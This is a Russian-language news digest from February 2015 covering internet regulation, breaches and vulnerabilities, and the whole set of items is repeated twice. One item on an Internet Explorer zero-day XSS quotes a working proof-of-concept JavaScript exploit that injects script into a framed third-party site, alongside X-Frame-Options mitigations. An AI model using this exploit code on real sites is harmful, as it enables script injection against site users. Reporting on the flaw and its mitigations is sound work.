Отправляет email-рассылки с помощью сервиса Sendsay

Новости NewList.ru

Подписаться Бесплатная «Серебряная» новостная рассылка Подписчиков 120 RSS
  Февраль 2015  
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


За последние 60 дней 12 выпусков (1-2 раза в неделю)


Сайт рассылки: http://www.newlist.ru/
Открыта: 01-09-2003
Адрес автора: comp.inet.news.newlist-owner@subscribe.ru

Автор
Lex

Статистика

120 подписчиков
0 за неделю
  Все выпуски  

Ассоциация пользователей интернета: Давление на интернет со стороны властей усиливается



Ассоциация пользователей интернета: Давление на интернет со стороны властей усиливается
2015-02-05 14:01 www.uvo.su
Результатом ограничений свободы интернета стала первая остановка роста числа пользователей и снижение количества доменов в зоне .ru за всю историю российского сегмента Сети.

Хакеры взломали сеть страховой компании Anthem и похитили данные о ее клиентах
2015-02-05 14:28 www.uvo.su
Похищенная информация включает в себя инициалы, адреса, информацию о трудоустройстве и уровне доходов.

Обнаружена уязвимость нулевого дня в плагине WordPress Fancybox
2015-02-05 15:16 www.uvo.su
Исследователи безопасности из Sucuri обнаружили ряд web-сайтов с инъекцией вредоносного iframe.

ИБ-эксперт получил $5 тысяч за нахождение серьезной XSS-уязвимости в HackerOne
2015-02-05 16:17 www.uvo.su
Эксплуатируя брешь, хакеры могут перенаправлять пользователей на произвольные web-сайты.

Верховная Рада в первом чтении разрешила прослушивать телефонные разговоры граждан
2015-02-05 17:03 www.uvo.su
Законопроект даст возможность проведения негласного расследования в отношении уклонистов, дезертиров и ушедших в самоволку.

Trend Micro: Российские хакеры взламывают iPhone с помощью вредоносного ПО XAgent
2015-02-05 17:18 www.uvo.su
После установки на смартфон вредонос получает доступ к текстовым сообщениям жертвы, фотографиям, контактам, геолокационным данным, списку установленных приложений и т.д.

Депутатов Госдумы призывают запретить россиянам анонимайзеры
2015-02-05 17:47 www.uvo.su
Согласно инициативе, блокировку соответствующих сервисов предлагается осуществлять без судебного разрешения.

В прошивке Siemens Ruggedcom WIN обнаружены критические уязвимости
2015-02-05 18:08 www.uvo.su
Эксплуатация данных брешей позволяет неавторизованному пользователю удаленно выполнять функции администратора, а также получить доступ к важной информации.

Китай запретил использовать псевдонимы при регистрации учетных записей в интернет-сервисах
2015-02-05 18:43 www.uvo.su
Под запрет попадут учетные записи, якобы принадлежащие правительственным организациям, государственным СМИ, а также аккаунты, пародирующие зарубежных лидеров.

В 2014 году Google заблокировала 524 млн вредоносных рекламных объявлений
2015-02-05 20:00 www.uvo.su
Злоумышленники улучшают технику и тактику инфицирования своих жертв с использованием вредоносной рекламы.

Доктор Веб: Новый бэкдор для ОС Linux позволяет осуществить DDoS-атаку
2015-02-05 20:18 www.uvo.su
Троян может обновить свой исполняемый файл или удалить себя.

XSS-уязвимость нулевого дня в Internet Explorer позволяет атаковать любые сайты
2015-02-05 20:55 www.uvo.su
Сегодня стало известно о появлении ранее неизвестной уязвимости межсайтового скриптинга в Microsoft Internet Explorer. Используя эту ошибку, удаленный пользователь может внедрить в HTML-страницу произвольный JavaScript-сценарий в обход политики единства происхождения практически на любом сайте. Исследователи из deusen.co.uk, разместившие PoC-код эксплойта, продемонстрировали эксплуатацию уязвимости на сайте первой по величине тиража ежедневной газеты Великобритании Daily Mail. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.co.uk, после чего ему выводится сообщение Hacked by Deusen. Сам код эксплойта выглядит следующим образом: function go() { w=window.frames[0]; w.setTimeout(alert(eval(x=top.frames[1];r=confirm(Close this window after 3 seconds...);x.location=javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22;)),1); } setTimeout(go(),1000); Уязвимость присутствует в Internet Explorer 10.x и 11.x. Подробное описание уязвимости доступно по адресу www.securitylab.ru/vulnerability/470863.php. В Сети уже появилось несколько примеров использования уязвимости, из которых видно, что под угрозой любые сайты, будь то портал международного форума по практической безопасности PHDays V (демонстрация уязвимости будет добавлена позже) или официальный сайт ФБР. Способы защиты Необходимо запретить сторонние iframe с помощью опции заголовка X-Frame-Options, отправляемого web-сервером. Для Apache настройка в .htaccess будет выглядеть так: Header always append X-Frame-Options SAMEORIGIN Для nginx: add_header X-Frame-Options SAMEORIGIN; Для IIS: ... ... При отсутствии возможности оперативной настройки серверов защититься можно с помощью решений класса Web Application Firewall (в качестве примера настройки PT Application Firewall). Стоит отметить, что в целом в последнее время участились 0day в инфраструктурных компонентах Shellshock, ghost и др. Подливает масла в огонь и корпорация Google, раскрывая подробности о брешах в Windows несмотря на призывы Microsoft к более гибкой системе раскрытия уязвимостей. Похоже, что привычный в среде исследователей подход узнал, помог закрыть уязвимость, опубликовал подробности уже не работает.

Награды найдут своих героев
2015-02-05 21:13 www.uvo.su
Сегодня в МИА Россия сегодня состоялась пресс-конференция, посвященная подведению итогов Всероссийской общественно-государственной инициативы Горячее сердце в 2015 году и подготовке к Торжественной церемонии награждения Нагрудным знаком Горячее сердце.

Предложение Владимира Пучкова об изменении статьи Кодекса РФ об административных правонарушениях поддержано Правительством
2015-02-05 21:20 www.uvo.su
На состоявшемся сегодня заседании Правительства Российской Федерации глава МЧС России Владимир Пучков представил проект федерального закона О внесении изменения в статью 28.3 Кодекса РФ об административных правонарушениях, разработанный во исполнение поручения Президента России.

Microsoft выплатила ZDI $125 тыс. за найденные уязвимости в Internet Explorer
2015-02-05 23:32 www.uvo.su
Полученные деньги команда Zero Day Initiative пожертвует Техасскому университету A&M, Университету Конкордия и Академии Хана.

АНБ перехватывало у хакеров похищенную информацию
2015-02-05 23:49 www.uvo.su
Спецслужба получала нужные данные, не утруждая себя грязной работой, которую оставляла хакерам.
Ассоциация пользователей интернета: Давление на интернет со стороны властей усиливается
2015-02-05 14:01 www.uvo.su
Результатом ограничений свободы интернета стала первая остановка роста числа пользователей и снижение количества доменов в зоне .ru за всю историю российского сегмента Сети.

Хакеры взломали сеть страховой компании Anthem и похитили данные о ее клиентах
2015-02-05 14:28 www.uvo.su
Похищенная информация включает в себя инициалы, адреса, информацию о трудоустройстве и уровне доходов.

Обнаружена уязвимость нулевого дня в плагине WordPress Fancybox
2015-02-05 15:16 www.uvo.su
Исследователи безопасности из Sucuri обнаружили ряд web-сайтов с инъекцией вредоносного iframe.

ИБ-эксперт получил $5 тысяч за нахождение серьезной XSS-уязвимости в HackerOne
2015-02-05 16:17 www.uvo.su
Эксплуатируя брешь, хакеры могут перенаправлять пользователей на произвольные web-сайты.

Верховная Рада в первом чтении разрешила прослушивать телефонные разговоры граждан
2015-02-05 17:03 www.uvo.su
Законопроект даст возможность проведения негласного расследования в отношении уклонистов, дезертиров и ушедших в самоволку.

Trend Micro: Российские хакеры взламывают iPhone с помощью вредоносного ПО XAgent
2015-02-05 17:18 www.uvo.su
После установки на смартфон вредонос получает доступ к текстовым сообщениям жертвы, фотографиям, контактам, геолокационным данным, списку установленных приложений и т.д.

Депутатов Госдумы призывают запретить россиянам анонимайзеры
2015-02-05 17:47 www.uvo.su
Согласно инициативе, блокировку соответствующих сервисов предлагается осуществлять без судебного разрешения.

В прошивке Siemens Ruggedcom WIN обнаружены критические уязвимости
2015-02-05 18:08 www.uvo.su
Эксплуатация данных брешей позволяет неавторизованному пользователю удаленно выполнять функции администратора, а также получить доступ к важной информации.

Китай запретил использовать псевдонимы при регистрации учетных записей в интернет-сервисах
2015-02-05 18:43 www.uvo.su
Под запрет попадут учетные записи, якобы принадлежащие правительственным организациям, государственным СМИ, а также аккаунты, пародирующие зарубежных лидеров.

В 2014 году Google заблокировала 524 млн вредоносных рекламных объявлений
2015-02-05 20:00 www.uvo.su
Злоумышленники улучшают технику и тактику инфицирования своих жертв с использованием вредоносной рекламы.

Доктор Веб: Новый бэкдор для ОС Linux позволяет осуществить DDoS-атаку
2015-02-05 20:18 www.uvo.su
Троян может обновить свой исполняемый файл или удалить себя.

XSS-уязвимость нулевого дня в Internet Explorer позволяет атаковать любые сайты
2015-02-05 20:55 www.uvo.su
Сегодня стало известно о появлении ранее неизвестной уязвимости межсайтового скриптинга в Microsoft Internet Explorer. Используя эту ошибку, удаленный пользователь может внедрить в HTML-страницу произвольный JavaScript-сценарий в обход политики единства происхождения практически на любом сайте. Исследователи из deusen.co.uk, разместившие PoC-код эксплойта, продемонстрировали эксплуатацию уязвимости на сайте первой по величине тиража ежедневной газеты Великобритании Daily Mail. При нажатии на специально сформированную ссылку пользователь перенаправляется на сайт dailymail.co.uk, после чего ему выводится сообщение Hacked by Deusen. Сам код эксплойта выглядит следующим образом: function go() { w=window.frames[0]; w.setTimeout(alert(eval(x=top.frames[1];r=confirm(Close this window after 3 seconds...);x.location=javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22;)),1); } setTimeout(go(),1000); Уязвимость присутствует в Internet Explorer 10.x и 11.x. Подробное описание уязвимости доступно по адресу www.securitylab.ru/vulnerability/470863.php. В Сети уже появилось несколько примеров использования уязвимости, из которых видно, что под угрозой любые сайты, будь то портал международного форума по практической безопасности PHDays V (демонстрация уязвимости будет добавлена позже) или официальный сайт ФБР. Способы защиты Необходимо запретить сторонние iframe с помощью опции заголовка X-Frame-Options, отправляемого web-сервером. Для Apache настройка в .htaccess будет выглядеть так: Header always append X-Frame-Options SAMEORIGIN Для nginx: add_header X-Frame-Options SAMEORIGIN; Для IIS: ... ... При отсутствии возможности оперативной настройки серверов защититься можно с помощью решений класса Web Application Firewall (в качестве примера настройки PT Application Firewall). Стоит отметить, что в целом в последнее время участились 0day в инфраструктурных компонентах Shellshock, ghost и др. Подливает масла в огонь и корпорация Google, раскрывая подробности о брешах в Windows несмотря на призывы Microsoft к более гибкой системе раскрытия уязвимостей. Похоже, что привычный в среде исследователей подход узнал, помог закрыть уязвимость, опубликовал подробности уже не работает.

Награды найдут своих героев
2015-02-05 21:13 www.uvo.su
Сегодня в МИА Россия сегодня состоялась пресс-конференция, посвященная подведению итогов Всероссийской общественно-государственной инициативы Горячее сердце в 2015 году и подготовке к Торжественной церемонии награждения Нагрудным знаком Горячее сердце.

Предложение Владимира Пучкова об изменении статьи Кодекса РФ об административных правонарушениях поддержано Правительством
2015-02-05 21:20 www.uvo.su
На состоявшемся сегодня заседании Правительства Российской Федерации глава МЧС России Владимир Пучков представил проект федерального закона О внесении изменения в статью 28.3 Кодекса РФ об административных правонарушениях, разработанный во исполнение поручения Президента России.

Microsoft выплатила ZDI $125 тыс. за найденные уязвимости в Internet Explorer
2015-02-05 23:32 www.uvo.su
Полученные деньги команда Zero Day Initiative пожертвует Техасскому университету A&M, Университету Конкордия и Академии Хана.

АНБ перехватывало у хакеров похищенную информацию
2015-02-05 23:49 www.uvo.su
Спецслужба получала нужные данные, не утруждая себя грязной работой, которую оставляла хакерам.
В избранное